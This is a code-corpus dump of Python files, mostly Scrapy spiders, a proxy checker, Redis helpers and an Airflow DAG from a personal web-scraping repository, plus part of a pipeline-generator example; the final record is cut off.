"text": "import GraphPreprocessor\nimport TaskGenerator\nimport ScheduleGenerator\nfrom domain.ErrorTypes import ErrorTypes\n\nfrom pprint import pprint\n\n# No need to keep data/state, so I did not make it a class..\n# This will be safe for multi-thread use as well~\n\ndef generate_pipeline(graph, args):\n success=False\n\n task_nodes, task_edges, error= __parse_graph(graph)\n # Re-consider the following...\n __add_app_id_to_task_nodes(task_nodes, args[\"scheduler_args\"][\"dag_args\"][\"app_id\"])\n if(error == ErrorTypes.NO_ERROR):\n task_codes, task_errors = __generate_task_codes(task_nodes)\n scheduler_code, scheduler_errors=ScheduleGenerator.generate_code(task_nodes, task_edges, args[\"scheduler_args\"])\n print_codes(task_codes, scheduler_code)\n\n if(not (bool(task_errors) or bool(scheduler_errors))):\n success=True\n __generate_task_scripts(task_codes, args[\"script_args\"])\n __generate_scheduler_script(scheduler_code, args[\"script_args\"])\n\n return success, {\"task_errors\": task_errors, \"scheduler_errors\": scheduler_errors}\n\n return success, {\"parsing_error\": error}\n\ndef __add_app_id_to_task_nodes(task_nodes, app_id):\n for task_node_id in task_nodes:\n task_nodes[task_node_id][\"app_id\"]=app_id\n\ndef __generate_task_scripts(task_codes, args):\n pass\n\ndef __generate_scheduler_script(scheduler_code, args):\n pass\n\ndef print_codes(task_codes, scheduler_code):\n print(\"Scheduler code\")\n pprint(scheduler_code)\n print(\"--------------------------------------------------------------------\")\n for tc in task_codes:\n print(\"Task_\"+tc)\n pprint(task_codes[tc])\n print(\"--------------------------------------------------------------------\")\n\ndef __generate_task_codes(task_nodes):\n task_codes = {}\n task_errors={}\n for task_node_id in task_nodes:\n task_code, errors = TaskGenerator.generate_code(task_nodes[task_node_id])\n task_codes[task_node_id]=task_code\n if(bool(errors)):\n task_errors[task_node_id]=errors\n\n return task_codes, task_errors\n\ndef __parse_graph(graph):\n # {\"graph\": {\"edges\":{\"nodeId1-nodeId2\": {...edge-props...}, ...}, \"nodes\": {\"nodeId1\": {...node-specs...}, ...}}}\n # Each node keeps its parent's id as well\n return GraphPreprocessor.preprocess_graph(graph)\n"
},
{
"alpha_fraction": 0.37505269050598145,
"alphanum_fraction": 0.39064475893974304,
"avg_line_length": 29.05063247680664,
"blob_id": "2b8ab452b5cec1e32f3dc74029d59f9972492303",
"content_id": "56d831a9afd48ac6ce2ec98b29623cfbaf978ac7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2373,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 79,
"path": "/arakat-backend/examples/Example1.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from pipeline_generator import PipelineGenerator\n\ngraph={\n \"nodes\": {\n \"node1\":\n {\n \"id\": \"node1\",\n \"name\": \"Batch Read from CSV\",\n \"category\": 0,\n \"parent\": \"task1\",\n \"node_id\": 47,\n \"node_type\": 0,\n \"family\": 0,\n \"compatible_with_stream\": False,\n \"compatible_stream_output_modes\": [],\n \"compatible_with_spark_pipeline\": False,\n \"is_splitter\": False,\n \"produces_model\": False,\n \"can_infer_schema\": True,\n \"file_type\": \"csv\",\n \"parameters\": {\n \"file_path\": \"filepath.csv\",\n \"header\": False,\n \"sep\": \",\",\n \"quote\": '\\\"'\n },\n \"df_constraints\": [],\n \"explanation\": \"Batch read from csv.\"\n },\n \"node2\":\n {\n \"id\": \"node2\",\n \"parent\": \"task1\",\n \"node_id\": 61,\n \"name\": \"Batch Write to Parquet\",\n \"category\": 1,\n \"node_type\": 0,\n \"family\": 2,\n \"compatible_with_stream\": False,\n \"compatible_stream_output_modes\": [],\n \"compatible_with_spark_pipeline\": False,\n \"is_splitter\": False,\n \"produces_model\": False,\n \"file_type\": \"parquet\",\n \"parameters\": {\n \"file_path\": \"targetfilepath.parquet\"\n },\n \"df_constraints\": [],\n \"explanation\": \"Batch write to parquet.\"\n },\n \"task1\": {\n \"id\": \"task1\",\n \"parent\": None,\n \"node_type\": 1\n }\n },\n \"edges\": {\"node1-node2\": {\"type\": \"dataframe\"}}\n}\n\n\nargs={\n \"scheduler_args\": {\n \"spark_runner_path\": \"my_spark_runner_path\",\n \"dag_args\": {\n \"app_id\": \"MyFirstApp\",\n \"default_args\": {\n \"owner\": \"airflow\",\n \"start_date\": \"01/01/2018\",\n \"end_date\": \"02/01/2018\",\n },\n \"schedule_interval\": \"@once\"\n }\n },\n \"script_args\": {\n\n }\n}\n\nsuccess, errors = PipelineGenerator.generate_pipeline(graph, args)"
}
] | 18 |
morefreeze/scrapy_projects
|
https://github.com/morefreeze/scrapy_projects
|
fcd4cf65cbf1d647ec3d4ae971914cc94d6a83ed
|
033b071b8c809d0b26aa4357712970dcba2e4bc0
|
919f739499fdd31aa3ea932cecb2585481f585b4
|
refs/heads/master
| 2022-11-17T17:39:42.193717 | 2020-11-08T09:45:35 | 2020-11-08T09:45:35 | 66,837,726 | 3 | 0 |
MIT
| 2016-08-29T11:26:55 | 2020-11-08T09:45:50 | 2022-11-04T19:44:07 |
Python
|
[
{
"alpha_fraction": 0.6215753555297852,
"alphanum_fraction": 0.6232876777648926,
"avg_line_length": 24.39130401611328,
"blob_id": "0d326c73eee829c8f53de1a38e4924f5cc6cd758",
"content_id": "0d06fdddd4af8745a1e4dcb49ae45b14d8df23e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 584,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 23,
"path": "/proxy/proxy/db.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport redis\nimport logging\nimport settings\n\n\nclass RedisPool(object):\n\n @classmethod\n def get_pool(cls, redis_host, redis_port, redis_db):\n \"\"\"build a redis connection\n :returns: a valid connection\n\n \"\"\"\n try:\n pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_db)\n return redis.Redis(connection_pool=pool)\n except Exception as e:\n logging.error('connection redis error[%s]' % (e))\n raise\n\ndef build_key(keys, sep=settings.REDIS_SEP):\n return sep.join(keys)\n"
},
{
"alpha_fraction": 0.6252737045288086,
"alphanum_fraction": 0.6340318918228149,
"avg_line_length": 26.799999237060547,
"blob_id": "1ef7667f33099b7f91add303697c2b6c74ce9d1a",
"content_id": "ff5ee63db91a88343b870f2d10ea4dbd687cd3ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3197,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 115,
"path": "/small/noticable_tpl/notice_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom os import path, environ\nfrom StringIO import StringIO\nfrom airflow import DAG\nfrom airflow.operators import BashOperator, BranchPythonOperator, PythonOperator, SlackAPIPostOperator\nfrom utils import period2timedelta, money2float\nfrom filter import Filter\nimport datetime\nimport pandas as pd\n\n\n# This store text that will sent by slack\nslack_message_key = 'slack_message'\n# This store data file which maybe checked\ncsv_file = 'xy.csv'\ndir = path.abspath(path.dirname(__file__))\n\n\n# If now() - execution_date >= long_time, spider won't run.\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(seconds=60*10)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\n\n\ndef filter_data(csv_file, **kwargs):\n f = pd.read_csv(csv_file)\n candidate = []\n filter = Filter()\n filter.install_rule(lambda v: not v['title'].startswith('test'))\n for row in f.iterrows():\n idx, v = row\n item = {\n 'title': v['title'],\n }\n if filter.check(item):\n candidate.append(item)\n return candidate\n\n\n# If len(candicate) > 0 will send to slack, the text will store as slack_txt_file\ndef need_slack(ti, **kwargs):\n candidate = ti.xcom_pull(key=None, task_ids='filter_data')\n try:\n os.remove(slack_txt_file)\n except:\n pass\n if candidate and len(candidate) > 0:\n s = StringIO()\n for can in candidate:\n s.write('%s\\n' % (\n can['title'],\n ))\n ti.xcom_push(slack_message_key, s.getvalue().decode('utf-8'))\n return 'post_slack'\n return ''\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 1, 5),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('xiaoying', default_args=default_args, schedule_interval='*/5 8-22 * * *')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && rm -f {csv_file} && scrapy runspider spiders/invest.py -t csv -o {csv_file}'.format(dir=dir, csv_file=csv_file),\n dag=dag\n)\n\nfilter_data = PythonOperator(\n task_id='filter_data',\n python_callable=filter_data,\n op_args=(csv_file, ),\n dag=dag\n)\n\nneed_slack = BranchPythonOperator(\n task_id='need_slack',\n python_callable=need_slack,\n dag=dag\n)\n\nslack_token = environ.get('SLACK_TOKEN')\ntxt = '''{{ task_instance.xcom_pull(task_ids='need_slack', key='%s') }}''' % (slack_message_key)\nif txt is None:\n txt = 'Nothing to read'\npost_slack = SlackAPIPostOperator(\n task_id='post_slack',\n token=slack_token,\n channel='#xiaoying',\n username='airflow',\n text='{{ execution_date }}\\n' + txt,\n dag=dag\n)\n\nonly_run_now >> run_spider >> filter_data >> need_slack >> post_slack\n"
},
{
"alpha_fraction": 0.5915399789810181,
"alphanum_fraction": 0.6153337955474854,
"avg_line_length": 22.27692222595215,
"blob_id": "2a092f1b9338bc5af06e74008b7debfaae14da2d",
"content_id": "c866c7fe7fc7f67e3997c1d7f45982d46b0d68c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1513,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 65,
"path": "/proxy/proxy/simple_proxy.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nimport urllib\nimport urllib2\nimport gevent\nfrom gevent.local import local\n\n\ndef test_url(opener, url):\n try:\n resp = opener.open(url, timeout=TIMEOUT)\n if resp and resp.code == 200:\n return True\n except Exception as e:\n print e\n return False\n\nstash = local()\nstash.gfw_succ = False\nstash.normal_succ = False\ncandidate_proxies = [\n '103.4.167.230:8080',\n '220.113.26.18:8080',\n]\ngfw_urls = [\n 'http://google.com',\n 'http://facebook.com',\n 'http://twitter.com',\n 'http://youtube.com',\n 'http://pornhub.com',\n]\nnormal_urls = [\n 'http://baidu.com',\n 'http://weibo.com',\n 'http://zhihu.com',\n 'http://tower.im',\n 'http://www.acfun.tv',\n]\nTIMEOUT = 3\ndef gfw_func(opener, url):\n if test_url(opener, url):\n stash.gfw_succ = True\n\ndef normal_func(opener, url):\n if test_url(opener, url):\n stash.normal_succ = True\n\nfor proxy in candidate_proxies:\n print \"Trying HTTP proxy %s\" % proxy\n ph = urllib2.ProxyHandler({'http': proxy})\n opener = urllib2.build_opener(ph)\n threads = []\n for url in gfw_urls:\n threads.append(gevent.spawn(gfw_func, opener, url))\n gevent.joinall(threads)\n threads = []\n for url in normal_urls:\n threads.append(gevent.spawn(normal_func, opener, url))\n gevent.joinall(threads)\n if stash.gfw_succ:\n print '%s is good for gfw' % (proxy)\n if stash.normal_succ:\n print '%s is good' % (proxy)\n"
},
{
"alpha_fraction": 0.48787447810173035,
"alphanum_fraction": 0.515691876411438,
"avg_line_length": 23.59649085998535,
"blob_id": "5c0a9fae1e54fe69863f2cd651622567abfb638a",
"content_id": "4f615ae88892b77e44c9cc7bd4df580404ab0f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 57,
"path": "/proxy/proxy/spiders/kdl_spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport scrapy\nimport redis\n\n\nclass KDLSpider(scrapy.Spider):\n name = 'kuaidaili_spider'\n IP_REGEX = re.compile('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}\\\n(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b')\n start_urls = [\n 'http://www.kuaidaili.com/free/inha/',\n 'http://www.kuaidaili.com/free/intr/',\n 'http://www.kuaidaili.com/free/outha/',\n 'http://www.kuaidaili.com/free/outtr/',\n ]\n\n \"\"\"Get proxy ip from url\"\"\"\n\n def __init__(self, page=2):\n \"\"\"\"\"\"\n self.page = int(page)\n\n def parse(self, response):\n \"\"\"parse crawl page\n\n :response: TODO\n :returns: None\n\n \"\"\"\n # debug\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n for i in range(1, self.page+1):\n yield scrapy.Request(\n response.request.url + '%s' % (i),\n self.parse_ip,\n dont_filter=True,\n )\n\n def parse_ip(self, response):\n \"\"\"parse ip\n\n :response: TODO\n :returns: TODO\n\n \"\"\"\n for tr in response.xpath('//table//tr'):\n tds = tr.xpath('td/text()')\n if len(tds) > 2:\n yield {'ip': tds[0].extract(), 'port': tds[1].extract()}\n"
},
{
"alpha_fraction": 0.6125289797782898,
"alphanum_fraction": 0.6658932566642761,
"avg_line_length": 24.352941513061523,
"blob_id": "c3231461172931a00e3102a1e47b1a2db0f9f074",
"content_id": "75fc5f84187a13b7a316f59fd86326380b3256a6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 17,
"path": "/proxy/proxy/test_checker.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom checker import NormalChecker, LadderChecker\nimport logging\n\n# Both test need run cow on local\ndef test_normal_proxy():\n test_host = 'http://127.0.0.1:7777'\n nc = NormalChecker(test_host, timeout=5)\n nc.check_proxy()\n assert nc.ret['ping']\n\n\ndef test_normal_proxy():\n test_host = 'http://127.0.0.1:7777'\n nc = LadderChecker(test_host, timeout=5)\n nc.check_proxy()\n assert nc.ret['ping']\n"
},
{
"alpha_fraction": 0.7432098984718323,
"alphanum_fraction": 0.7580246925354004,
"avg_line_length": 39.5,
"blob_id": "3d50dc741ec5ce7c5767202fed2a54c8f1e242b1",
"content_id": "3e22c9a71be162707d450c274a2c0370814009aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 405,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 10,
"path": "/proxy/proxy/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "First scrapy some proxy candidates using spiders, run `checker.py` to check them\nby connecting httpbin website each EXPIRE_DELTA(default 3 hours).\n\n```shell\nscrapy runspider spiders/kdl_spider.py -a page=3\npython checker.py # run forever, use c-c to break\n```\n\n`redis-cli -p 4149` to connect redis,\ncheck out `srandmember normal` (only for inside website) or `srandmember gfw` (may connect fb, twitter)\n"
},
{
"alpha_fraction": 0.5102880597114563,
"alphanum_fraction": 0.5131687521934509,
"avg_line_length": 36.96875,
"blob_id": "2aba67a5fe81e093c7a0c45411b8eb7e5abab713",
"content_id": "89740df2f56d8c4fa4e995dc5a175949d1d31e27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2454,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 64,
"path": "/small/xiaoying/spiders/invest.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass InvestmentSpider(scrapy.Spider):\n name = 'Investment'\n allow_domain = ['xiaoying.com']\n cin_fields = {\n u'预期年化': 'expected_benefit',\n u'剩余期限': 'period',\n u'项目期限': 'period',\n }\n\n def __init__(self, url=None, page=None):\n if not url:\n url = 'https://www.xiaoying.com/invest/list?status=COLLECT'\n if not page:\n page = 1\n self.start_url = '%s&p1=%s' % (url, page)\n\n def start_requests(self):\n if self.start_url:\n return [scrapy.Request(\n self.start_url,\n callback=self.parse_item_follow_next_page,\n )]\n\n def parse_item_follow_next_page(self, response):\n lis = response.xpath('//div[contains(@class, \"card-in\")]')\n for li in lis:\n item = {}\n title_line = li.xpath('.//div[contains(@class, \"card-hd\")]')\n title = safe_list_get(title_line.xpath('./a/text()').extract(), 0, '')\n item['title'] = title\n sub_title = ','.join(title_line.xpath('./i/text()').extract())\n item['sub_title'] = sub_title\n cin_items = li.xpath('.//ul/li')\n cin_dict = {}\n for cin_item in cin_items:\n lhs, rhs = cin_item.xpath('./span/text()').extract()\n if lhs == '' and rhs == '':\n continue\n for (text, field_name) in self.cin_fields.items():\n if lhs.startswith(text):\n item[field_name] = rhs\n break\n cin_dict[lhs] = rhs\n item['cin_items'] = cin_dict\n investing = safe_list_get(li.xpath('.//span[contains(@class, \"investing\")]/span/text()').extract(), 0, '')\n item['investing'] = investing\n money = safe_list_get(li.xpath('.//span[contains(@class, \"surplus\")]/span/text()').extract(), 0, '')\n item['money'] = money\n yield item\n\n pager = response.xpath('//div[contains(@class, \"pagination\")]')\n next_page = safe_list_get(pager.xpath('./span/following-sibling::a/@href').extract(), 0, '')\n if next_page:\n url = response.urljoin(next_page)\n yield scrapy.Request(url, callback=self.parse_item_follow_next_page)\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 11,
"blob_id": "16fdc28f87f01f4089b4827fda585d401987a638",
"content_id": "da3e1e5f59d76072775c5daa77cb83e79eeb5bc5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 12,
"license_type": "permissive",
"max_line_length": 11,
"num_lines": 1,
"path": "/house/lianjia/requirements.txt",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "tqdm==4.8.4\n"
},
{
"alpha_fraction": 0.5064599514007568,
"alphanum_fraction": 0.5426356792449951,
"avg_line_length": 23.1875,
"blob_id": "cfa219e1f8df21c05f4460cc8d9cc96bcb7b5b9f",
"content_id": "a54206889a85f26b52d690d1d86ff451418d1ce2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1161,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 48,
"path": "/proxy/proxy/spiders/ip84_spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport scrapy\nimport redis\n\n\n# This site seems contains harmful program.\nclass IP84Spider(scrapy.Spider):\n name = 'ip_spider'\n IP_REGEX = re.compile('\\\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}\\\n(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\b')\n start_urls = ['http://ip84.com/dl']\n\n \"\"\"Get proxy ip from url\"\"\"\n\n def __init__(self):\n \"\"\"\"\"\"\n\n def parse(self, response):\n \"\"\"parse crawl page\n\n :response: TODO\n :returns: None\n\n \"\"\"\n # debug\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n for i in range(1, 2):\n yield scrapy.Request(response.request.url + '/%s' % (i), callback=self.parse_ip)\n\n def parse_ip(self, response):\n \"\"\"parse ip\n\n :response: TODO\n :returns: TODO\n\n \"\"\"\n for tr in response.xpath('//table[@class=\"list\"]//tr'):\n tds = tr.xpath('td/text()')\n if len(tds) > 2:\n yield {'ip': tds[0].extract(), 'port': tds[1].extract()}\n"
},
{
"alpha_fraction": 0.5673701167106628,
"alphanum_fraction": 0.573051929473877,
"avg_line_length": 21.399999618530273,
"blob_id": "4f020397fb38b62cec260966d9fd3dc78c5affed",
"content_id": "461abca24f40e6628bba917d5fd5c2112267aa9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 55,
"path": "/proxy/proxy/redis_queue.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport datetime\nfrom tqdm import tqdm\nimport urllib\nimport urllib2\nimport re\nimport redis\n\n\nclass RedisQueue(object):\n HOST = 'localhost'\n PORT = 4149\n DB = 0\n PUSHED_FMT = '%s:pushed'\n POPED_FMT = '%s:poped'\n\n \"\"\"Use redis implement a random array\"\"\"\n\n def __init__(self, name):\n \"\"\"\"\"\"\n self.poped_name = self.POPED_FMT % (name)\n self.pushed_name = self.PUSHED_FMT % (name)\n pool = redis.ConnectionPool(host=self.HOST, port=self.PORT, db=self.DB)\n self.conn = redis.Redis(connection_=pool)\n\n def push(self, ip):\n \"\"\"Push a ip to queue, check duplicate\n\n :ip: TODO\n :returns: TODO\n\n \"\"\"\n if not self.is_dup(ip):\n self.conn.sadd(self.pushed_name, ip)\n\n def pop(self):\n \"\"\"Pop the first ip and add it to poped\n :returns: TODO\n\n \"\"\"\n ret = self.conn.srandmember(self.pushed_name)\n if ret:\n self.conn.smove(self.pushed_name, self.poped_name, ret)\n return ret\n\n def is_dup(self, ip):\n \"\"\"Check duplicate of given ip\n\n :ip: TODO\n :returns: TODO\n\n \"\"\"\n return self.conn.sismember(self.poped_name, ip)\n"
},
{
"alpha_fraction": 0.5410385131835938,
"alphanum_fraction": 0.5452261567115784,
"avg_line_length": 28.850000381469727,
"blob_id": "e1d605070b07f67927c8a064db1f4a09e7a07fa6",
"content_id": "95a6d14670015fb4baa26b7b4522ad14379bd5a0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1194,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 40,
"path": "/small/noticable_tpl/simple.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass SimpleSpider(scrapy.Spider):\n name = 'Simple'\n allow_domain = ['simple.com']\n\n def __init__(self, url=None, page=None):\n if not url:\n url = 'https://www.simple.com/'\n if not page:\n page = 1\n self.start_url = '%s&p1=%s' % (url, page)\n\n def start_requests(self):\n if self.start_url:\n return [scrapy.Request(\n self.start_url,\n callback=self.parse_item_follow_next_page,\n )]\n\n def parse_item_follow_next_page(self, response):\n lis = response.xpath('some_xpath_of_list')\n for li in lis:\n item = {}\n title = safe_list_get(li.xpath('./title_xpath/text()').extract(), 0, '')\n item['title'] = title\n # Add other attributes\n yield item\n\n next_page = safe_list_get(response.xpath('next_page_xpath').extract(), 0, '')\n if next_page:\n url = response.urljoin(next_page)\n yield scrapy.Request(url, callback=self.parse_item_follow_next_page)\n"
},
{
"alpha_fraction": 0.5676813721656799,
"alphanum_fraction": 0.5793393850326538,
"avg_line_length": 41.88888931274414,
"blob_id": "8c4ce18357edf4bcccc78979bacdc75d46d8461a",
"content_id": "4da0692d6cbe142b9f24526dadc5aa33cb601233",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3088,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 72,
"path": "/caoporn/caoporn/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport pymongo\nimport datetime\nfrom caoporn.items import VideoItem\n\ndef get_default(arr, idx, default_value):\n \"\"\"get arr[idx] or return default_value\n \"\"\"\n try:\n return arr[idx]\n except IndexError:\n return default_value\n\ndef convert_time_len(tl):\n sec = 0\n for x in tl.split(':'):\n sec = sec * 60 + int(x)\n return sec\n\nclass ListSpider(scrapy.Spider):\n name = \"list\"\n allowed_domains = ['caoporn.com', 'caomoo.com', 'caomee.com', '51.caoxee.com', 'cao.vgao.xyz']\n # find from mongo\n start_url = 'http://cao.vgao.xyz/videos?page=1'\n max_page = 5000\n\n def __init__(self, *args, **kwargs):\n self.page_cnt = 0\n self.force = 'force' in kwargs\n\n # checkpoint is always last complete parsing page url, so start with it will\n # repeat parse these items again\n def start_requests(self):\n mongo_uri=self.crawler.settings.get('MONGO_URI')\n mongo_db=self.crawler.settings.get('MONGO_DB')\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n collection_name = 'video'\n newest_videos = db[collection_name].find().sort([('$natural', -1)]).limit(10)\n self.newest_vids = {v['hash'] for v in newest_videos}\n return [scrapy.Request(url=self.start_url, callback=self.parse_video)]\n\n def parse(self, response):\n pass\n\n def parse_video(self, response):\n touch_newest = False\n self.page_cnt += 1\n for vid in response.xpath('//div[@class=\"video_box\"]'):\n item = VideoItem()\n item['name'] = get_default(vid.xpath('a/img/@title').extract(), 0, '')\n item['url'] = response.urljoin(get_default(vid.xpath('a/@href').extract(), 0, ''))\n item['hash'] = vid.xpath('a/@href').re('/video[0-9]*/([0-9a-f]+)/')[0]\n touch_newest = touch_newest or item['hash'] in self.newest_vids\n if not self.force and touch_newest:\n self.log('touch newest @ %s' % item['hash'])\n return\n item['cover'] = response.urljoin(get_default(vid.xpath('a/img/@src').extract(), 0, ''))\n item['length'] = int(convert_time_len(get_default(vid.xpath('div[@class=\"box_left\"]/text()').extract(), 0, '00:00').strip()))\n item['views'] = int(get_default(vid.xpath('div[@class=\"box_right\"]/text()').re('[0-9]+'), 0, 0))\n item['is_hd'], item['is_private'] = False, False\n for img_src in vid.xpath('img/@src').extract():\n item['is_hd'] = item['is_hd'] or 'hd.png' in img_src\n item['is_private'] = item['is_private'] or 'private-video.png' in img_src\n item['_create_time'] = datetime.datetime.now()\n yield item\n\n next_url = response.xpath('//div[@class=\"pagination\"]/ul/li[position()=last()]/a[@class=\"prevnext\"]/@href').extract()\n if len(next_url) > 0 and self.page_cnt < self.max_page:\n self.log('next page is: %s' % next_url[-1])\n yield scrapy.Request(url=next_url[-1], callback=self.parse_video)\n"
},
{
"alpha_fraction": 0.4906832277774811,
"alphanum_fraction": 0.5043478012084961,
"avg_line_length": 32.54166793823242,
"blob_id": "9bb3f6c430d18a075c65310e4afeebf3644540a5",
"content_id": "dab4dfed73e9930691260a16a92ca3d37e8aee1c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 805,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 24,
"path": "/small/small/spiders/btsync.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BtsyncSpider(scrapy.Spider):\n name = \"btsync\"\n allowed_domains = [\"btsynckeys.com/\"]\n\n def start_requests(self):\n for i in range(0, 621, 10):\n url = 'http://btsynckeys.com/%s' % (i)\n yield scrapy.Request(url, callback=self.parse)\n\n def parse(self, response):\n trs = response.xpath('//table/tbody/tr')\n for tr in trs:\n tds = tr.xpath('./td')\n name, secret, _, create_time, peers = tds\n yield {\n 'name': name.xpath('./text()').extract()[0],\n 'secret': secret.xpath('./text()').extract()[0],\n 'create_time': create_time.xpath('./text()').extract()[0],\n 'peers': peers.xpath('./text()').extract()[0],\n }\n"
},
{
"alpha_fraction": 0.596256673336029,
"alphanum_fraction": 0.596256673336029,
"avg_line_length": 25.714284896850586,
"blob_id": "6be27b079cb69658dd41044d85c5ddeba9b1f861",
"content_id": "e8d95688a4328cfe5a5cfb385a31ae644fd17176",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 14,
"path": "/duokan/duokan/dkbson.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport tempfile\nimport sys\n\ndef decode(bytes):\n with tempfile.NamedTemporaryFile(delete=False) as f:\n f.write(bytes)\n f.flush()\n try:\n res = subprocess.check_output('node duokan/decode.js %s' % (f.name), shell=True)\n except Exception as e:\n print(e, file=sys.stderr)\n res = {}\n return res\n"
},
{
"alpha_fraction": 0.5724138021469116,
"alphanum_fraction": 0.5735632181167603,
"avg_line_length": 33.79999923706055,
"blob_id": "c248e8e74c39a705c11fd6dfee776029f75ca43d",
"content_id": "94641ec0d84c4ee49f0f8c000fe32b1cf17df3fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 870,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 25,
"path": "/caoporn/caoporn/middlewares/spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
